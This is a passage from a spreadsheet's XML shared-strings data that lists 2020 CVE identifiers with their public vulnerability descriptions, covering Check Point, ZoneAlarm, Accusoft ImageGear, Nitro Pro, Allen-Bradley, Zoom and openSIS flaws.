    <t>ZoneAlarm Firewall and Antivirus products before version 15.8.109.18436 allow an attacker who already has access to the system to execute code at elevated privileges through a combination of file permission manipulation and exploitation of Windows CVE-2020-00896 on unpatched systems.</t>
  </si>
  <si>
    <t>CVE-2020-6014</t>
  </si>
  <si>
    <t>Check Point Endpoint Security Client for Windows, with Anti-Bot or Threat Emulation blades installed, before version E83.20, tries to load a non-existent DLL during a query for the Domain Name. An attacker with administrator privileges can leverage this to gain code execution within a Check Point Software Technologies signed binary, where under certain circumstances may cause the client to terminate.</t>
  </si>
  <si>
    <t>CVE-2020-6015</t>
  </si>
  <si>
    <t>Check Point Endpoint Security for Windows before E84.10 can reach denial of service during clean install of the client which will prevent the storage of service log files in non-standard locations.</t>
  </si>
  <si>
    <t>CVE-2020-6016</t>
  </si>
  <si>
    <t>Valve's Game Networking Sockets prior to version v1.2.0 improperly handles unreliable segments with negative offsets in function SNP_ReceiveUnreliableSegment(), leading to a Heap-Based Buffer Underflow and a free() of memory not from the heap, resulting in a memory corruption and probably even a remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-6017</t>
  </si>
  <si>
    <t>Valve's Game Networking Sockets prior to version v1.2.0 improperly handles long unreliable segments in function SNP_ReceiveUnreliableSegment() when configured to support plain-text messages, leading to a Heap-Based Buffer Overflow and resulting in a memory corruption and possibly even a remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-6018</t>
  </si>
  <si>
    <t>Valve's Game Networking Sockets prior to version v1.2.0 improperly handles long encrypted messages in function AES_GCM_DecryptContext::Decrypt() when compiled using libsodium, leading to a Stack-Based Buffer Overflow and resulting in a memory corruption and possibly even a remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-6019</t>
  </si>
  <si>
    <t>Valve's Game Networking Sockets prior to version v1.2.0 improperly handles inlined statistics messages in function CConnectionTransportUDPBase::Received_Data(), leading to an exception thrown from libprotobuf and resulting in a crash.</t>
  </si>
  <si>
    <t>CVE-2020-6020</t>
  </si>
  <si>
    <t>Check Point Security Management's Internal CA web management before Jumbo HFAs R80.10 Take 278, R80.20 Take 160, R80.30 Take 210, and R80.40 Take 38, can be manipulated to run commands as a high privileged user or crash, due to weak input validation on inputs by a trusted management administrator.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L</t>
  </si>
  <si>
    <t>CVE-2020-6021</t>
  </si>
  <si>
    <t>Check Point Endpoint Security Client for Windows before version E84.20 allows write access to the directory from which the installation repair takes place. Since the MS Installer allows regular users to run the repair, an attacker can initiate the installation repair and place a specially crafted DLL in the repair folder which will run with the Endpoint client’s privileges.</t>
  </si>
  <si>
    <t>CVE-2020-6022</t>
  </si>
  <si>
    <t>Check Point ZoneAlarm before version 15.8.139.18543 allows a local actor to delete arbitrary files while restoring files in Anti-Ransomware.</t>
  </si>
  <si>
    <t>CVE-2020-6023</t>
  </si>
  <si>
    <t>Check Point ZoneAlarm before version 15.8.139.18543 allows a local actor to escalate privileges while restoring files in Anti-Ransomware.</t>
  </si>
  <si>
    <t>CVE-2020-6024</t>
  </si>
  <si>
    <t>Check Point SmartConsole before R80.10 Build 185, R80.20 Build 119, R80.30 before Build 94, R80.40 before Build 415, and R81 before Build 548 were vulnerable to a possible local privilege escalation due to running executables from a directory with write access to all authenticated users.</t>
  </si>
  <si>
    <t>CVE-2020-6058</t>
  </si>
  <si>
    <t>An exploitable out-of-bounds read vulnerability exists in the way MiniSNMPD version 1.4 parses incoming SNMP packets. A specially crafted SNMP request can trigger an out-of-bounds memory read, which can result in the disclosure of sensitive information and denial of service. To trigger this vulnerability, an attacker needs to send a specially crafted packet to the vulnerable server.</t>
  </si>
  <si>
    <t>CVE-2020-6059</t>
  </si>
  <si>
    <t>An exploitable out of bounds read vulnerability exists in the way MiniSNMPD version 1.4 parses incoming SNMP packets. A specially crafted SNMP request can trigger an out of bounds memory read which can result in sensitive information disclosure and Denial Of Service. In order to trigger this vulnerability, an attacker needs to send a specially crafted packet to the vulnerable server.</t>
  </si>
  <si>
    <t>CVE-2020-6060</t>
  </si>
  <si>
    <t>A stack buffer overflow vulnerability exists in the way MiniSNMPD version 1.4 handles multiple connections. A specially timed sequence of SNMP connections can trigger a stack overflow, resulting in a denial of service. To trigger this vulnerability, an attacker needs to simply initiate multiple connections to the server.</t>
  </si>
  <si>
    <t>CVE-2020-6061</t>
  </si>
  <si>
    <t>An exploitable heap out-of-bounds read vulnerability exists in the way CoTURN 4.5.1.1 web server parses POST requests. A specially crafted HTTP POST request can lead to information leaks and other misbehavior. An attacker needs to send an HTTPS request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6062</t>
  </si>
  <si>
    <t>An exploitable denial-of-service vulnerability exists in the way CoTURN 4.5.1.1 web server parses POST requests. A specially crafted HTTP POST request can lead to server crash and denial of service. An attacker needs to send an HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6063</t>
  </si>
  <si>
    <t>An exploitable out-of-bounds write vulnerability exists in the uncompress_scan_line function of the igcore19d.dll library of Accusoft ImageGear, version 19.5.0. A specially crafted PCX file can cause an out-of-bounds write, resulting in a remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6064</t>
  </si>
  <si>
    <t>CVE-2020-6065</t>
  </si>
  <si>
    <t>An exploitable out-of-bounds write vulnerability exists in the bmp_parsing function of the igcore19d.dll library of Accusoft ImageGear, version 19.5.0. A specially crafted BMP file can cause an out-of-bounds write, resulting in a remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6066</t>
  </si>
  <si>
    <t>An exploitable out-of-bounds write vulnerability exists in the igcore19d.dll JPEG SOFx parser of the Accusoft ImageGear 19.5.0 library. A specially crafted JPEG file can cause an out-of-bounds write, resulting in a remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6067</t>
  </si>
  <si>
    <t>An exploitable out-of-bounds write vulnerability exists in the igcore19d.dll TIFF tifread parser of the Accusoft ImageGear 19.5.0 library. A specially crafted TIFF file can cause an out-of-bounds write, resulting in a remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6068</t>
  </si>
  <si>
    <t>An exploitable out-of-bounds write vulnerability exists in the igcore19d.dll PNG pngread parser of the Accusoft ImageGear 19.5.0 library. A specially crafted PNG file can cause an out-of-bounds write, resulting in a remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6069</t>
  </si>
  <si>
    <t>An exploitable out-of-bounds write vulnerability exists in the igcore19d.dll JPEG jpegread precision parser of the Accusoft ImageGear 19.5.0 library. A specially crafted JPEG file can cause an out-of-bounds write, resulting in a remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6070</t>
  </si>
  <si>
    <t>An exploitable code execution vulnerability exists in the file system checking functionality of fsck.f2fs 1.12.0. A specially crafted f2fs file can cause a logic flaw and out-of-bounds heap operations, resulting in code execution. An attacker can provide a malicious file to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6071</t>
  </si>
  <si>
    <t>An exploitable denial-of-service vulnerability exists in the resource record-parsing functionality of Videolabs libmicrodns 0.1.0. When parsing compressed labels in mDNS messages, the compression pointer is followed without checking for recursion, leading to a denial of service. An attacker can send an mDNS message to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6072</t>
  </si>
  <si>
    <t>An exploitable code execution vulnerability exists in the label-parsing functionality of Videolabs libmicrodns 0.1.0. When parsing compressed labels in mDNS messages, the rr_decode function's return value is not checked, leading to a double free that could be exploited to execute arbitrary code. An attacker can send an mDNS message to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6073</t>
  </si>
  <si>
    <t>An exploitable denial-of-service vulnerability exists in the TXT record-parsing functionality of Videolabs libmicrodns 0.1.0. When parsing the RDATA section in a TXT record in mDNS messages, multiple integer overflows can be triggered, leading to a denial of service. An attacker can send an mDNS message to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6074</t>
  </si>
  <si>
    <t>An exploitable code execution vulnerability exists in the PDF parser of Nitro Pro 13.9.1.155. A specially crafted PDF document can cause a use-after-free which can lead to remote code execution. An attacker can provide a malicious file to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6075</t>
  </si>
  <si>
    <t>An exploitable out-of-bounds write vulnerability exists in the store_data_buffer function of the igcore19d.dll library of Accusoft ImageGear 19.5.0. A specially crafted PNG file can cause an out-of-bounds write, resulting in a remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6076</t>
  </si>
  <si>
    <t>An exploitable out-of-bounds write vulnerability exists in the igcore19d.dll ICO icoread parser of the Accusoft ImageGear 19.5.0 library. A specially crafted ICO file can cause an out-of-bounds write, resulting in a remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6077</t>
  </si>
  <si>
    <t>An exploitable denial-of-service vulnerability exists in the message-parsing functionality of Videolabs libmicrodns 0.1.0. When parsing mDNS messages, the implementation does not properly keep track of the available data in the message, possibly leading to an out-of-bounds read that would result in a denial of service. An attacker can send an mDNS message to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6078</t>
  </si>
  <si>
    <t>An exploitable denial-of-service vulnerability exists in the message-parsing functionality of Videolabs libmicrodns 0.1.0. When parsing mDNS messages in mdns_recv, the return value of the mdns_read_header function is not checked, leading to an uninitialized variable usage that eventually results in a null pointer dereference, leading to service crash. An attacker can send a series of mDNS messages to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6079</t>
  </si>
  <si>
    <t>An exploitable denial-of-service vulnerability exists in the resource allocation handling of Videolabs libmicrodns 0.1.0. When encountering errors while parsing mDNS messages, some allocated data is not freed, possibly leading to a denial-of-service condition via resource exhaustion. An attacker can send one mDNS message repeatedly to trigger this vulnerability through decoding of the domain name performed by rr_decode.</t>
  </si>
  <si>
    <t>CVE-2020-6080</t>
  </si>
  <si>
    <t>An exploitable denial-of-service vulnerability exists in the resource allocation handling of Videolabs libmicrodns 0.1.0. When encountering errors while parsing mDNS messages, some allocated data is not freed, possibly leading to a denial-of-service condition via resource exhaustion. An attacker can send one mDNS message repeatedly to trigger this vulnerability through the function rr_read_RR [5] reads the current resource record, except for the RDATA section. This is read by the loop at in rr_read. For each RR type, a different function is called. When the RR type is 0x10, the function rr_read_TXT is called at [6].</t>
  </si>
  <si>
    <t>CVE-2020-6081</t>
  </si>
  <si>
    <t>An exploitable code execution vulnerability exists in the PLC_Task functionality of 3S-Smart Software Solutions GmbH CODESYS Runtime 3.5.14.30. A specially crafted network request can cause remote code execution. An attacker can send a malicious packet to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6082</t>
  </si>
  <si>
    <t>An exploitable out-of-bounds write vulnerability exists in the ico_read function of the igcore19d.dll library of Accusoft ImageGear 19.6.0. A specially crafted ICO file can cause an out-of-bounds write, resulting in a remote code execution. An attacker needs to provide a malformed file to the victim to trigger the vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6083</t>
  </si>
  <si>
    <t>An exploitable denial of service vulnerability exists in the ENIP Request Path Port Segment functionality of Allen-Bradley Flex IO 1794-AENT/B. A specially crafted network request can cause a loss of communications with the device resulting in denial-of-service. An attacker can send a malicious packet to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6084</t>
  </si>
  <si>
    <t>An exploitable denial of service vulnerability exists in the ENIP Request Path Logical Segment functionality of Allen-Bradley Flex IO 1794-AENT/B 4.003. A specially crafted network request can cause a loss of communications with the device resulting in denial-of-service. An attacker can send a malicious packet to trigger this vulnerability by sending an Electronic Key Segment with less bytes than required by the Key Format Table.</t>
  </si>
  <si>
    <t>CVE-2020-6085</t>
  </si>
  <si>
    <t>An exploitable denial of service vulnerability exists in the ENIP Request Path Logical Segment functionality of Allen-Bradley Flex IO 1794-AENT/B 4.003. A specially crafted network request can cause a loss of communications with the device resulting in denial-of-service. An attacker can send a malicious packet to trigger this vulnerability by sending an Electronic Key Segment with less than 0x18 bytes following the Key Format field.</t>
  </si>
  <si>
    <t>CVE-2020-6086</t>
  </si>
  <si>
    <t>An exploitable denial of service vulnerability exists in the ENIP Request Path Data Segment functionality of Allen-Bradley Flex IO 1794-AENT/B. A specially crafted network request can cause a loss of communications with the device resulting in denial-of-service. An attacker can send a malicious packet to trigger this vulnerability.If the Simple Segment Sub-Type is supplied, the device treats the byte following as the Data Size in words. When this value represents a size greater than what remains in the packet data, the device enters a fault state where communication with the device is lost and a physical power cycle is required.</t>
  </si>
  <si>
    <t>CVE-2020-6087</t>
  </si>
  <si>
    <t>An exploitable denial of service vulnerability exists in the ENIP Request Path Data Segment functionality of Allen-Bradley Flex IO 1794-AENT/B. A specially crafted network request can cause a loss of communications with the device resulting in denial-of-service. An attacker can send a malicious packet to trigger this vulnerability If the ANSI Extended Symbol Segment Sub-Type is supplied, the device treats the byte following as the Data Size in words. When this value represents a size greater than what remains in the packet data, the device enters a fault state where communication with the device is lost and a physical power cycle is required.</t>
  </si>
  <si>
    <t>CVE-2020-6088</t>
  </si>
  <si>
    <t>An exploitable denial of service vulnerability exists in the ENIP Request Path Network Segment functionality of Allen-Bradley Flex IO 1794-AENT/B 4.003. A specially crafted network request can cause a loss of communications with the device resulting in denial-of-service. An attacker can send a malicious packet to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6089</t>
  </si>
  <si>
    <t>An exploitable code execution vulnerability exists in the ANI file format parser of Leadtools 20. A specially crafted ANI file can cause a buffer overflow resulting in remote code execution. An attacker can provide a malicious file to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6090</t>
  </si>
  <si>
    <t>An exploitable code execution vulnerability exists in the Web-Based Management (WBM) functionality of WAGO PFC 200 03.03.10(15). A specially crafted series of HTTP requests can cause code execution resulting in remote code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6091</t>
  </si>
  <si>
    <t>An exploitable authentication bypass vulnerability exists in the ESPON Web Control functionality of Epson EB-1470Ui MAIN: 98009273ESWWV107 MAIN2: 8X7325WWV303. A specially crafted series of HTTP requests can cause authentication bypass resulting in information disclosure. An attacker can send an HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6092</t>
  </si>
  <si>
    <t>An exploitable code execution vulnerability exists in the way Nitro Pro 13.9.1.155 parses Pattern objects. A specially crafted PDF file can trigger an integer overflow that can lead to arbitrary code execution. In order to trigger this vulnerability, victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2020-6093</t>
  </si>
  <si>
    <t>An exploitable information disclosure vulnerability exists in the way Nitro Pro 13.9.1.155 does XML error handling. A specially crafted PDF document can cause uninitialized memory access resulting in information disclosure. In order to trigger this vulnerability, victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2020-6094</t>
  </si>
  <si>
    <t>An exploitable code execution vulnerability exists in the TIFF fillinraster function of the igcore19d.dll library of Accusoft ImageGear 19.4, 19.5 and 19.6. A specially crafted TIFF file can cause an out-of-bounds write, resulting in remote code execution. An attacker can provide a malicious file to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6095</t>
  </si>
  <si>
    <t>An exploitable denial of service vulnerability exists in the GstRTSPAuth functionality of GStreamer/gst-rtsp-server 1.14.5. A specially crafted RTSP setup request can cause a null pointer deference resulting in denial-of-service. An attacker can send a malicious packet to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6096</t>
  </si>
  <si>
    <t>An exploitable signed comparison vulnerability exists in the ARMv7 memcpy() implementation of GNU glibc 2.30.9000. Calling memcpy() (on ARMv7 targets that utilize the GNU glibc implementation) with a negative value for the 'num' parameter results in a signed comparison vulnerability. If an attacker underflows the 'num' parameter to memcpy(), this vulnerability could lead to undefined behavior such as writing to out-of-bounds memory and potentially remote code execution. Furthermore, this memcpy() implementation allows for program execution to continue in scenarios where a segmentation fault or crash should have occurred. The dangers occur in that subsequent execution and iterations of this code will be executed with this corrupted data.</t>
  </si>
  <si>
    <t>195</t>
  </si>
  <si>
    <t>CVE-2020-6097</t>
  </si>
  <si>
    <t>An exploitable denial of service vulnerability exists in the atftpd daemon functionality of atftp 0.7.git20120829-3.1+b1. A specially crafted sequence of RRQ-Multicast requests trigger an assert() call resulting in denial-of-service. An attacker can send a sequence of malicious packets to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6098</t>
  </si>
  <si>
    <t>An exploitable denial of service vulnerability exists in the freeDiameter functionality of freeDiameter 1.3.2. A specially crafted Diameter request can trigger a memory corruption resulting in denial-of-service. An attacker can send a malicious packet to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6099</t>
  </si>
  <si>
    <t>An exploitable code execution vulnerability exists in the file format parsing functionality of Graphisoft BIMx Desktop Viewer 2019.2.2328. A specially crafted file can cause a heap buffer overflow resulting in a code execution. An attacker can provide a malicious file to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6100</t>
  </si>
  <si>
    <t>An exploitable memory corruption vulnerability exists in AMD atidxx64.dll 26.20.15019.19000 graphics driver. A specially crafted pixel shader can cause memory corruption vulnerability. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability potentially could be triggered from guest machines running virtualization environments (ie. VMware, qemu, VirtualBox etc.) in order to perform guest-to-host escape - as it was demonstrated before (TALOS-2018-0533, TALOS-2018-0568, etc.). Theoretically this vulnerability could be also triggered from web browser (using webGL and webassembly). This vulnerability was triggered from HYPER-V guest using RemoteFX feature leading to executing the vulnerable code on the HYPER-V host (inside of the rdvgm.exe process).</t>
  </si>
  <si>
    <t>CVE-2020-6101</t>
  </si>
  <si>
    <t>An exploitable code execution vulnerability exists in the Shader functionality of AMD Radeon DirectX 11 Driver atidxx64.dll 26.20.15019.19000. An attacker can provide a specially crafted shader file to trigger this vulnerability, resulting in code execution. This vulnerability can be triggered from a HYPER-V guest using the RemoteFX feature, leading to executing the vulnerable code on the HYPER-V host (inside of the rdvgm.exe process). Theoretically this vulnerability could be also triggered from web browser (using webGL and webassembly).</t>
  </si>
  <si>
    <t>CVE-2020-6102</t>
  </si>
  <si>
    <t>An exploitable code execution vulnerability exists in the Shader functionality of AMD Radeon DirectX 11 Driver atidxx64.dll 26.20.15019.19000. An attacker can provide a a specially crafted shader file to trigger this vulnerability, resulting in code execution. This vulnerability can be triggered from a HYPER-V guest using the RemoteFX feature, leading to executing the vulnerable code on the HYPER-V host (inside of the rdvgm.exe process). Theoretically this vulnerability could be also triggered from web browser (using webGL and webassembly).</t>
  </si>
  <si>
    <t>CVE-2020-6103</t>
  </si>
  <si>
    <t>CVE-2020-6104</t>
  </si>
  <si>
    <t>An exploitable information disclosure vulnerability exists in the get_dnode_of_data functionality of F2fs-Tools F2fs.Fsck 1.13. A specially crafted f2fs filesystem can cause information disclosure resulting in a information disclosure. An attacker can provide a malicious file to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6105</t>
  </si>
  <si>
    <t>An exploitable code execution vulnerability exists in the multiple devices functionality of F2fs-Tools F2fs.Fsck 1.13. A specially crafted f2fs filesystem can cause Information overwrite resulting in a code execution. An attacker can provide a malicious file to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6106</t>
  </si>
  <si>
    <t>An exploitable information disclosure vulnerability exists in the init_node_manager functionality of F2fs-Tools F2fs.Fsck 1.12 and 1.13. A specially crafted filesystem can be used to disclose information. An attacker can provide a malicious file to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6107</t>
  </si>
  <si>
    <t>An exploitable information disclosure vulnerability exists in the dev_read functionality of F2fs-Tools F2fs.Fsck 1.13. A specially crafted f2fs filesystem can cause an uninitialized read resulting in an information disclosure. An attacker can provide a malicious file to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6108</t>
  </si>
  <si>
    <t>An exploitable code execution vulnerability exists in the fsck_chk_orphan_node functionality of F2fs-Tools F2fs.Fsck 1.13. A specially crafted f2fs filesystem can cause a heap buffer overflow resulting in a code execution. An attacker can provide a malicious file to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6109</t>
  </si>
  <si>
    <t>An exploitable path traversal vulnerability exists in the Zoom client, version 4.6.10 processes messages including animated GIFs. A specially crafted chat message can cause an arbitrary file write, which could potentially be abused to achieve arbitrary code execution. An attacker needs to send a specially crafted message to a target user or a group to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6110</t>
  </si>
  <si>
    <t>An exploitable partial path traversal vulnerability exists in the way Zoom Client version 4.6.10 processes messages including shared code snippets. A specially crafted chat message can cause an arbitrary binary planting which could be abused to achieve arbitrary code execution. An attacker needs to send a specially crafted message to a target user or a group to trigger this vulnerability. For the most severe effect, target user interaction is required.</t>
  </si>
  <si>
    <t>CVE-2020-6111</t>
  </si>
  <si>
    <t>An exploitable denial-of-service vulnerability exists in the IPv4 functionality of Allen-Bradley MicroLogix 1100 Programmable Logic Controller Systems Series B FRN 16.000, Series B FRN 15.002, Series B FRN 15.000, Series B FRN 14.000, Series B FRN 13.000, Series B FRN 12.000, Series B FRN 11.000 and Series B FRN 10.000. A specially crafted packet can cause a major error, resulting in a denial of service. An attacker can send a malicious packet to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6112</t>
  </si>
  <si>
    <t>An exploitable code execution vulnerability exists in the JPEG2000 Stripe Decoding functionality of Nitro Software, Inc.’s Nitro Pro 13.13.2.242 when decoding sub-samples. While initializing tiles with sub-sample data, the application can miscalculate a pointer for the stripes in the tile which allow for the decoder to write out of-bounds and cause memory corruption. This can result in code execution. A specially crafted image can be embedded inside a PDF and loaded by a victim in order to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6113</t>
  </si>
  <si>
    <t>An exploitable vulnerability exists in the object stream parsing functionality of Nitro Software, Inc.’s Nitro Pro 13.13.2.242 when updating its cross-reference table. When processing an object stream from a PDF document, the application will perform a calculation in order to allocate memory for the list of indirect objects. Due to an error when calculating this size, an integer overflow may occur which can result in an undersized buffer being allocated. Later when initializing this buffer, the application can write outside its bounds which can cause a memory corruption that can lead to code execution. A specially crafted document can be delivered to a victim in order to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6114</t>
  </si>
  <si>
    <t>An exploitable SQL injection vulnerability exists in the Admin Reports functionality of Glacies IceHRM v26.6.0.OS (Commit bb274de1751ffb9d09482fd2538f9950a94c510a) . A specially crafted HTTP request can cause SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6115</t>
  </si>
  <si>
    <t>An exploitable vulnerability exists in the cross-reference table repairing functionality of Nitro Software, Inc.’s Nitro Pro 13.13.2.242. While searching for an object identifier in a malformed document that is missing from the cross-reference table, the application will save a reference to the object’s cross-reference table entry inside a stack variable. If the referenced object identifier is not found, the application may resize the cross-reference table which can change the scope of its entry. Later when the application tries to reference cross-reference entry via the stack variable, the application will access memory belonging to the recently freed table causing a use-after-free condition. A specially crafted document can be delivered by an attacker and loaded by a victim in order to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6116</t>
  </si>
  <si>
    <t>An arbitrary code execution vulnerability exists in the rendering functionality of Nitro Software, Inc.’s Nitro Pro 13.13.2.242. When drawing the contents of a page using colors from an indexed colorspace, the application can miscalculate the size of a buffer when allocating space for its colors. When using this allocated buffer, the application can write outside its bounds and cause memory corruption which can lead to code execution. A specially crafted document must be loaded by a victim in order to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6117</t>
  </si>
  <si>
    <t>SQL injection vulnerabilities exist in the CheckDuplicateStudent.php page of OS4Ed openSIS 7.3. The bday parameter in the page CheckDuplicateStudent.php is vulnerable to SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6118</t>
  </si>
  <si>
    <t>SQL injection vulnerabilities exist in the CheckDuplicateStudent.php page of OS4Ed openSIS 7.3. The bmonth parameter in the page CheckDuplicateStudent.php is vulnerable to SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6119</t>
  </si>
  <si>
    <t>SQL injection vulnerabilities exist in the CheckDuplicateStudent.php page of OS4Ed openSIS 7.3. The byear parameter in the page CheckDuplicateStudent.php is vulnerable to SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6120</t>
  </si>
  <si>
    <t>SQL injection vulnerability exists in the CheckDuplicateStudent.php page of OS4Ed openSIS 7.3. The fn parameter in the page CheckDuplicateStudent.php is vulnerable to SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6121</t>
  </si>
  <si>
    <t>SQL injection vulnerabilities exist in the CheckDuplicateStudent.php page of OS4Ed openSIS 7.3. The ln parameter in the page CheckDuplicateStudent.php is vulnerable to SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6122</t>
  </si>
  <si>
    <t>SQL injection vulnerability exists in the CheckDuplicateStudent.php page of OS4Ed openSIS 7.3. The mn parameter in the page CheckDuplicateStudent.php is vulnerable to SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6123</t>
  </si>
  <si>
    <t>An exploitable sql injection vulnerability exists in the email parameter functionality of OS4Ed openSIS 7.3. The email parameter in the page EmailCheck.php is vulnerable to SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6124</t>
  </si>
  <si>
    <t>An exploitable sql injection vulnerability exists in the email parameter functionality of OS4Ed openSIS 7.3. The email parameter in the page EmailCheckOthers.php is vulnerable to SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6125</t>
  </si>
  <si>
    <t>An exploitable SQL injection vulnerability exists in the GetSchool.php functionality of OS4Ed openSIS 7.3. A specially crafted HTTP request can lead to SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6126</t>
  </si>
  <si>
    <t>SQL injection vulnerability exists in the CoursePeriodModal.php page of OS4Ed openSIS 7.3. The course_period_id parameter in the page CoursePeriodModal.php is vulnerable to SQL injection. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.</t>
  </si>
  <si>
    <t>CVE-2020-6127</t>
  </si>
  <si>
    <t>SQL injection vulnerability exists in the CoursePeriodModal.php page of OS4Ed openSIS 7.3. The id parameter in the page CoursePeriodModal.php is vulnerable to SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6128</t>
  </si>
  <si>
    <t>SQL injection vulnerability exists in the CoursePeriodModal.php page of OS4Ed openSIS 7.3. A specially crafted HTTP request can lead to SQL injection. The meet_date parameter in the page CoursePeriodModal.php is vulnerable to SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6129</t>
  </si>
  <si>
    <t>SQL injection vulnerabilities exist in the course_period_id parameters used in OS4Ed openSIS 7.3 pages. The course_period_id parameter in the page CpSessionSet.php is vulnerable to SQL injection.An attacker can make an authenticated HTTP request to trigger these vulnerabilities.</t>
  </si>
  <si>
    <t>CVE-2020-6130</t>
  </si>
  <si>
    <t>SQL injection vulnerabilities exist in the course_period_id parameters used in OS4Ed openSIS 7.3 pages. The course_period_id parameter in the page MassDropSessionSet.php is vulnerable to SQL injection. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.</t>
  </si>
  <si>
    <t>CVE-2020-6131</t>
  </si>
  <si>
    <t>SQL injection vulnerabilities exist in the course_period_id parameters used in OS4Ed openSIS 7.3 pages. The course_period_id parameter in the page MassScheduleSessionSet.php is vulnerable to SQL injection. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.</t>
  </si>
  <si>
    <t>CVE-2020-6132</t>
  </si>
  <si>
    <t>SQL injection vulnerability exists in the ID parameters of OS4Ed openSIS 7.3 pages. The id parameter in the page ChooseCP.php is vulnerable to SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6133</t>
  </si>
  <si>
    <t>SQL injection vulnerabilities exist in the ID parameters of OS4Ed openSIS 7.3 pages. The id parameter in the page CourseMoreInfo.php is vulnerable to SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6134</t>
  </si>
  <si>
    <t>SQL injection vulnerabilities exist in the ID parameters of OS4Ed openSIS 7.3 pages. The id parameter in the page MassDropModal.php is vulnerable to SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6135</t>
  </si>
  <si>
    <t>An exploitable SQL injection vulnerability exists in the Validator.php functionality of OS4Ed openSIS 7.3. A specially crafted HTTP request can lead to SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6136</t>
  </si>
  <si>
